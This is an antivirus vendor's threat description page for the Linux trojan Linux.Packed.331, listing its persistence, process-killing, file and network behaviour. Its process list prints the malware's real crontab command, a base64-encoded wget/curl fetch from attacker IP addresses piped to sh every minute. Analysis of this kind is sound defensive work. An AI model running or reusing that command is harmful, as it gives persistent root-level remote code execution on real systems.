Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Packed.331

Added to the Dr.Web virus database: 2019-03-11

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
  • gsjekn
  • brsntj
Launches processes:
  • sh -c echo '* * * * * echo -n \"d2dldCAtTyAtIGh0dHA6Ly84Ny4yMzYuMjEyLjIzNy9kL3ouc2h8c2ggfHwgY3VybCBodHRwOi8vODcuMjM2LjIxMi4yMzcvZC96LmpwZ3xzaCA7IHdnZXQgLU8gLSBodHRwOi8vMTg1LjE2NS4xNjkuNi9kL3ouc2h8c2ggfHwgY3VybCBodHRwOi8vMTg1LjE2NS4xNjkuNi9kL3ouanBnfHNoIA==\" | base64 -d |sh > /dev/null' | crontab -;
  • crontab -
  • sh -c /root/eeiifn breeii
  • sh -c /root/eeiifn brsntj
  • /root/eeiifn brsntj
Kills system processes:
  • sshd
Kills the following processes:
  • systemd
  • kthreadd
  • ksoftirqd/0
  • kworker/0:0
  • kworker/0:0H
  • kworker/u2:0
  • rcu_sched
  • rcu_bh
  • migration/0
  • watchdog/0
  • khelper
  • kdevtmpfs
  • netns
  • khungtaskd
  • writeback
  • ksmd
  • crypto
  • kintegrityd
  • bioset
  • kblockd
  • kworker/0:1
  • kswapd0
  • fsnotify_mark
  • kthrotld
  • ipv6_addrconf
  • deferwq
  • kworker/u2:1
  • ata_sff
  • scsi_eh_0
  • scsi_tmf_0
  • scsi_eh_1
  • scsi_tmf_1
  • kworker/u2:2
  • kworker/u2:3
  • kworker/0:2
  • kworker/0:1H
  • jbd2/sda1-8
  • ext4-rsv-conver
  • kauditd
  • systemd-journal
  • systemd-udevd
  • kpsmoused
  • ttm_swap
  • kworker/0:3
  • kvm-irqfd-clean
  • dhclient
  • rpcbind
  • rpc.statd
  • rpciod
  • nfsiod
  • rpc.idmapd
  • cron
  • atd
  • systemd-logind
  • rsyslogd
  • acpid
  • dbus-daemon
  • agetty
  • exim4
  • (sd-pam)
  • bash
  • run.sh
  • /bin/sh
Performs operations with the file system:
Modifies file access rights:
  • /root/eeiifn
  • /var/spool/cron/crontabs/tmp.SPDLWP
Creates or modifies files:
  • /root/eeiifn
  • /var/spool/cron/crontabs/tmp.SPDLWP
Deletes files:
  • /root/eeiifn
Network activity:
HTTP GET requests:
  • 87.###.212.237/d/sss

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number